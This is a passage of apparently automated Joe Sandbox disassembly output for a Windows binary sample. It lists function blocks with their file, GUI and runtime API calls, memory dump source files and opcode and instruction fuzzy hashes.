                                                • __EH_prolog3_GS.LIBCMT ref: 00B0EC6A
                                                • DeleteFileW.KERNELBASE(?,00000024,00B0D6F7,?), ref: 00B0EC7D
                                                • DeleteFileW.KERNEL32(00000000,?,00000000), ref: 00B0ECBD
                                                Similarity
                                                • API ID: DeleteFile$H_prolog3_
                                                • String ID:
                                                • API String ID: 3558260747-0
                                                APIs
                                                • __EH_prolog3_GS.LIBCMT ref: 00B0ED26
                                                • GetFileAttributesW.KERNELBASE(?,00000024,00B0ED16,00000000,00B0A4A1,5EA84158,?,00B0CDDD,?,?,?,?,?,?,?,?), ref: 00B0ED39
                                                • GetFileAttributesW.KERNELBASE(?,?,?), ref: 00B0ED79
                                                Similarity
                                                • API ID: AttributesFile$H_prolog3_
                                                • String ID:
                                                • API String ID: 2559025557-0
                                                APIs
                                                • SetFilePointer.KERNELBASE(000000FF,?,?,?,?,00000000,?,00000000,00B0E3B1,?,?,00000000,?,?,00B0CC21,?), ref: 00B0E55F
                                                • GetLastError.KERNEL32 ref: 00B0E56E
                                                Similarity
                                                • API ID: ErrorFileLastPointer
                                                • String ID:
                                                • API String ID: 2976181284-0
                                                APIs
                                                  • Part of subcall function 00B30005: GetLastError.KERNEL32(?,?,00B2B581,?,00B4E088,?,00B2AE80,?,00B4E088,?,00000007), ref: 00B30009
                                                  • Part of subcall function 00B30005: _free.LIBCMT ref: 00B3003C
                                                  • Part of subcall function 00B30005: SetLastError.KERNEL32(00000000,00B4E088,?,00000007), ref: 00B3007D
                                                  • Part of subcall function 00B30005: _abort.LIBCMT ref: 00B30083
                                                  • Part of subcall function 00B327FE: _abort.LIBCMT ref: 00B32830
                                                  • Part of subcall function 00B327FE: _free.LIBCMT ref: 00B32864
                                                  • Part of subcall function 00B3246B: GetOEMCP.KERNEL32(00000000,?,?,00B326F4,?), ref: 00B32496
                                                • _free.LIBCMT ref: 00B3274F
                                                • _free.LIBCMT ref: 00B32785
                                                Similarity
                                                • API ID: _free$ErrorLast_abort
                                                • String ID:
                                                • API String ID: 2991157371-0
                                                APIs
                                                • FlushFileBuffers.KERNEL32(?), ref: 00B0E78C
                                                • SetFileTime.KERNELBASE(?,?,?,?), ref: 00B0E840
                                                Similarity
                                                • API ID: File$BuffersFlushTime
                                                • String ID:
                                                • API String ID: 1392018926-0
                                                APIs
                                                • __EH_prolog3_GS.LIBCMT ref: 00B1FB52
                                                • SHFileOperationW.SHELL32(?,?,?,?,?,?,00000000,00B5535C), ref: 00B1FC24
                                                  • Part of subcall function 00B014A7: _wcslen.LIBCMT ref: 00B014B8
                                                Similarity
                                                • API ID: FileH_prolog3_Operation_wcslen
                                                • String ID:
                                                • API String ID: 3104323202-0
                                                • Opcode ID: 47d71d9360ccc0cdc2ba2ba0a06ee5899aa95f57e33e45ad5117cd5515a552f1
                                                • Instruction ID: da01ff542b35df42623c62d8456013c1df2ee6ba09421c21167238f190364255
                                                • Opcode Fuzzy Hash: 47d71d9360ccc0cdc2ba2ba0a06ee5899aa95f57e33e45ad5117cd5515a552f1
                                                • Instruction Fuzzy Hash: 96311671D01258DEDB15EFE9C895AEDBBF4BF08311F9401AAE419A72A1DB701A85CF10
                                                APIs
                                                • SetFilePointer.KERNELBASE(000000FF,00000000,00000000,00000001), ref: 00B0E897
                                                • GetLastError.KERNEL32 ref: 00B0E8A4
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: ErrorFileLastPointer
                                                • String ID:
                                                • API String ID: 2976181284-0
                                                • Opcode ID: 88be492cbe51547279ed35793e5ea4d49ff410b11c08b5fa32e60af984de926c
                                                • Instruction ID: cefe1a3473736578dd5ecc7f6bdf3b1dc114cf9049d269f5179ee5f3ec034d1c
                                                • Opcode Fuzzy Hash: 88be492cbe51547279ed35793e5ea4d49ff410b11c08b5fa32e60af984de926c
                                                • Instruction Fuzzy Hash: 3711E531600700ABE7389664C8807AA7BE9EB45360F608BA9E072936D0D7B0ED05C760
                                                APIs
                                                • __EH_prolog3_catch_GS.LIBCMT ref: 00B23C82
                                                • _wcslen.LIBCMT ref: 00B23C99
                                                  • Part of subcall function 00B16A89: _wcslen.LIBCMT ref: 00B16AA6
                                                  • Part of subcall function 00B0B03D: __EH_prolog3_GS.LIBCMT ref: 00B0B044
                                                  • Part of subcall function 00B0B3E1: __EH_prolog3_GS.LIBCMT ref: 00B0B3E8
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: H_prolog3__wcslen$H_prolog3_catch_
                                                • String ID:
                                                • API String ID: 1265872803-0
                                                • Opcode ID: 6561c0e6e184465ced0f9d081bbf60abaa9e9184db148bb93dd1acf782cf0122
                                                • Instruction ID: 290293792bf164fe6a7970f895cb0c6c7a1403f881b207d2d9e5802847a55478
                                                • Opcode Fuzzy Hash: 6561c0e6e184465ced0f9d081bbf60abaa9e9184db148bb93dd1acf782cf0122
                                                • Instruction Fuzzy Hash: 9311A935911B909EC724EB689C31BDC7FF8AB15313F1441DAE44497393CFB05A448BA1
                                                APIs
                                                • __EH_prolog3_GS.LIBCMT ref: 00B01CE9
                                                • GetDlgItem.USER32(?,?), ref: 00B01D01
                                                  • Part of subcall function 00B014A7: _wcslen.LIBCMT ref: 00B014B8
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: H_prolog3_Item_wcslen
                                                • String ID:
                                                • API String ID: 896027972-0
                                                • Opcode ID: 1acbdf287b68ed361b56aabe9248cc32be82e588e1037fe41860e592e3e61060
                                                • Instruction ID: 321940b31eae9af75d06b610d7b2a3b448d5ef1f4f158f8592256f5f2a0e4b92
                                                • Opcode Fuzzy Hash: 1acbdf287b68ed361b56aabe9248cc32be82e588e1037fe41860e592e3e61060
                                                • Instruction Fuzzy Hash: EC01D4716416149FD728EFACC886BEDBFE8EF54300F500A9AF816A71E1CB709A01CB10
                                                APIs
                                                • GetCurrentProcess.KERNEL32(02000000,?,00000002,00000002,?,00B176EA,00B10B6F), ref: 00B176B4
                                                • GetProcessAffinityMask.KERNEL32(00000000,?,00B176EA), ref: 00B176BB
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: Process$AffinityCurrentMask
                                                • String ID:
                                                • API String ID: 1231390398-0
                                                • Opcode ID: 385ff71478e6f509ddd48e6efbd6dade55f08c1c24305449bc6fe90448fb82cc
                                                • Instruction ID: 51ed25f774bd1a7566a999466a1c9970b7d77ec250d477679292dda82a26ac29
                                                • Opcode Fuzzy Hash: 385ff71478e6f509ddd48e6efbd6dade55f08c1c24305449bc6fe90448fb82cc
                                                • Instruction Fuzzy Hash: 8AE09A32B94906A78F198BA9DC099EF76EEEA4424832440BAA453E3200ED74DE4157A0
                                                APIs
                                                • GdiplusShutdown.GDIPLUS(?,?,?,?,00B39B73,000000FF), ref: 00B1F578
                                                • CoUninitialize.COMBASE(?,?,?,?,00B39B73,000000FF), ref: 00B1F57D
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: GdiplusShutdownUninitialize
                                                • String ID:
                                                • API String ID: 3856339756-0
                                                • Opcode ID: 108de5d7dcae825302a1817eb44b083b0a8f628c82c9c48d957645cfeacd19bd
                                                • Instruction ID: 3b908e94d307b69f131e6193d56c2f911568e7181627e200ca997cc1d6627db7
                                                • Opcode Fuzzy Hash: 108de5d7dcae825302a1817eb44b083b0a8f628c82c9c48d957645cfeacd19bd
                                                • Instruction Fuzzy Hash: 8AF05E76604A14AFC711DF59EC41B5ABBE8FB49760F1042A6E416D3760DF74A800CA94
                                                APIs
                                                • GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00B1E86A
                                                • GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 00B1E871
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: BitmapCreateFromGdipStream
                                                • String ID:
                                                • API String ID: 1918208029-0
                                                • Opcode ID: 2ba98eb48ca51c45e2b2458834513679b6c720e0a6d2db4e40842fee54d72f25
                                                • Instruction ID: 667a0b8615e47a84462abd5a2b1cd5715a923ed7ddcb4cc66d7349d368e69ea7
                                                • Opcode Fuzzy Hash: 2ba98eb48ca51c45e2b2458834513679b6c720e0a6d2db4e40842fee54d72f25
                                                • Instruction Fuzzy Hash: 4BE012B1901218EFCB20DF95D9057DDB7F8EB04764F60849AA899A3701D670EE44EB91
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: ItemShowWindow
                                                • String ID:
                                                • API String ID: 3351165006-0
                                                • Opcode ID: 9d22c023ca9d65ec6f6249e6084dd9e088a7b894ba34b135182a3c0d24d2a5c3
                                                • Instruction ID: c2caaeef215c113bae88ef8d94c9a9ab3d0fb762f153f69a3ec1c940d55cd314
                                                • Opcode Fuzzy Hash: 9d22c023ca9d65ec6f6249e6084dd9e088a7b894ba34b135182a3c0d24d2a5c3
                                                • Instruction Fuzzy Hash: FEC0123219C600BECB010B70EC09E2A7BA89B94212F00C944B1A5D1060CE39C010DB11
                                                APIs
                                                • GetDlgItem.USER32(?,?), ref: 00B01CD2
                                                • KiUserCallbackDispatcher.NTDLL(00000000), ref: 00B01CD9
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: CallbackDispatcherItemUser
                                                • String ID:
                                                • API String ID: 4250310104-0
                                                • Opcode ID: 737215b2401471769b2704f5194e663c694d5bd602e79ad538b1d26d47308198
                                                • Instruction ID: 628dff67f43d7facc942fa14895ad6b5831222f3eeacb5b0f0a2dc93f93df304
                                                • Opcode Fuzzy Hash: 737215b2401471769b2704f5194e663c694d5bd602e79ad538b1d26d47308198
                                                • Instruction Fuzzy Hash: 73C04C7654C740BFCB015BA0AD1CD2FBFA9AB95312F00C989B6A591120CE358410DB11
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: H_prolog3
                                                • String ID:
                                                • API String ID: 431132790-0
                                                • Opcode ID: 43e4401aa52928ed6459ae562cf5fe58425b2709f52d4b10b297fd8f5b874ee6
                                                • Instruction ID: 08341f3b1d37d6cc2dbf263e11cc36e0f3317e1adbd1d1fe0100b361d48f019d
                                                • Opcode Fuzzy Hash: 43e4401aa52928ed6459ae562cf5fe58425b2709f52d4b10b297fd8f5b874ee6
                                                • Instruction Fuzzy Hash: 5AC14A70A042559BDF259F68C8987AD7FE4AF4A300F1840F9EC09DF2D6CB749949CBA1
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: H_prolog3
                                                • String ID:
                                                • API String ID: 431132790-0
                                                • Opcode ID: 24d314bd2c7992a5b66cd7eba88106434dc12e2c8b7bab693843c3dad5cc804c
                                                • Instruction ID: 34811765c77ab1b378a764c03ad824f26d3269235976714849176e9ed2a07d28
                                                • Opcode Fuzzy Hash: 24d314bd2c7992a5b66cd7eba88106434dc12e2c8b7bab693843c3dad5cc804c
                                                • Instruction Fuzzy Hash: B18179719043948FDB24EF24D8A5BEBB7E5FF51300F9009EEE45997180EBB0AD848795
                                                APIs
                                                • __EH_prolog3.LIBCMT ref: 00B020B7
                                                  • Part of subcall function 00B080EC: __EH_prolog3.LIBCMT ref: 00B080F3
                                                  • Part of subcall function 00B12815: __EH_prolog3.LIBCMT ref: 00B1281C
                                                  • Part of subcall function 00B076E7: __EH_prolog3.LIBCMT ref: 00B076EE
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: H_prolog3
                                                • String ID:
                                                • API String ID: 431132790-0
                                                • Opcode ID: 9bff6f6f099c8e7bb1d728ac85fe4edca8d8adeeb54f81716b726eb91d532fba
                                                • Instruction ID: a21d541be9d654c2ae2c61502a5c7bffec2bf6fa46f75830c847db6a4adbc53d
                                                • Opcode Fuzzy Hash: 9bff6f6f099c8e7bb1d728ac85fe4edca8d8adeeb54f81716b726eb91d532fba
                                                • Instruction Fuzzy Hash: 9C51E2B1A057808EDB44DF6A84807C9BBE0AF59300F0882FADC4DDE6ABDB740254CB61
                                                APIs
                                                • __EH_prolog3_GS.LIBCMT ref: 00B0B3E8
                                                  • Part of subcall function 00B0F711: FindClose.KERNELBASE(00000000,000000FF,00000049,00000049,?,?,00B0A684,?,?,00000000,?,?,?,?,?,?), ref: 00B0F739
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: CloseFindH_prolog3_
                                                • String ID:
                                                • API String ID: 2672038326-0
                                                • Opcode ID: 63f4523f17f94c29fc3a32b897cf1ef0dd8346d1c9f50d00e52345dcdba84e8f
                                                • Instruction ID: c5c5a2589597d216fb8b600178cc8c52a51018feac3b1a5643f04a3b1c6b61b2
                                                • Opcode Fuzzy Hash: 63f4523f17f94c29fc3a32b897cf1ef0dd8346d1c9f50d00e52345dcdba84e8f
                                                • Instruction Fuzzy Hash: 43413570900609CFDB34DFA9C896AAEBBF1FF05304F5444ADE15A9B392D730A946CB25
                                                APIs
                                                • __EH_prolog3_GS.LIBCMT ref: 00B02C37
                                                  • Part of subcall function 00B1880E: __EH_prolog3.LIBCMT ref: 00B18815
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: H_prolog3H_prolog3_
                                                • String ID:
                                                • API String ID: 3355343447-0
                                                • Opcode ID: 7bca0c622a4fbe434499ccd571ddabcc70ecfa8f48094b25ad5fe3596d5a6cad
                                                • Instruction ID: a36e7122bb2413af14176f6a8521eeb4884c0b7128dc0efb80b3a04bfc41d77c
                                                • Opcode Fuzzy Hash: 7bca0c622a4fbe434499ccd571ddabcc70ecfa8f48094b25ad5fe3596d5a6cad
                                                • Instruction Fuzzy Hash: 8231FD7190120CAEDF19DBE4D8959EEBFF9EF18300F5405AAF405A7291DB709D89CB60
                                                APIs
                                                • __EH_prolog3.LIBCMT ref: 00B076EE
                                                  • Part of subcall function 00B14F2B: __EH_prolog3.LIBCMT ref: 00B14F32
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: H_prolog3
                                                • String ID:
                                                • API String ID: 431132790-0
                                                • Opcode ID: 6e1ac2af5e9428289593b58ad3028c3d5e8364e7e27f61bc5cd2a7b049cb1518
                                                • Instruction ID: 18e83b1ad202eb8f5cfcf5ec0198866648e25b37eb4a4ad8f93d85fcd0dce1f7
                                                • Opcode Fuzzy Hash: 6e1ac2af5e9428289593b58ad3028c3d5e8364e7e27f61bc5cd2a7b049cb1518
                                                • Instruction Fuzzy Hash: BD4163B4816B85CAC724DF7AD1493CAFBE8AFA5300F10995FD0AE93361D7B025448F19
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: H_prolog3
                                                • String ID:
                                                • API String ID: 431132790-0
                                                • Opcode ID: cab9f97e63b20e8bf7bac265719ffb65e065b2fbeb052894983c2c13f756af5a
                                                • Instruction ID: 1064b44fe17249e373b03508444321a33ac26a4fd925f57b27287a153ed9adb4
                                                • Opcode Fuzzy Hash: cab9f97e63b20e8bf7bac265719ffb65e065b2fbeb052894983c2c13f756af5a
                                                • Instruction Fuzzy Hash: 4A2106B19012229BEF289F749C5AA9E76E4FF04354F1501BAE509EB2C1DB709D80C7E4
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: H_prolog3
                                                • String ID:
                                                • API String ID: 431132790-0
                                                • Opcode ID: 25a143d13808a51f29d66fceb04ed8167be6792816b48139d21d0613e4e4d01c
                                                • Instruction ID: 1ba09265321e4514b9bcf9cfc0119a7df406b3ab92441276391677dfdc25f2d7
                                                • Opcode Fuzzy Hash: 25a143d13808a51f29d66fceb04ed8167be6792816b48139d21d0613e4e4d01c
                                                • Instruction Fuzzy Hash: 79218372A0161A9BCB14DFE9DC81AEEBBF9FF88300F14445AF504B7281DB749E008B95
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: H_prolog3_
                                                • String ID:
                                                • API String ID: 2427045233-0
                                                • Opcode ID: 90d56617d36f790ed75c69ce670b99c52f569be0f1ec4eded0297e44da0ec48e
                                                • Instruction ID: b6c05b23e18250244f7fe3f297466c39b8ce8506f5b251e5e636881cb915fa3a
                                                • Opcode Fuzzy Hash: 90d56617d36f790ed75c69ce670b99c52f569be0f1ec4eded0297e44da0ec48e
                                                • Instruction Fuzzy Hash: 0721AE30641208AADF209E68C882EEE7BE9EF12750F545DC8F4A2A71D1CB70DE49C760
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: H_prolog3_
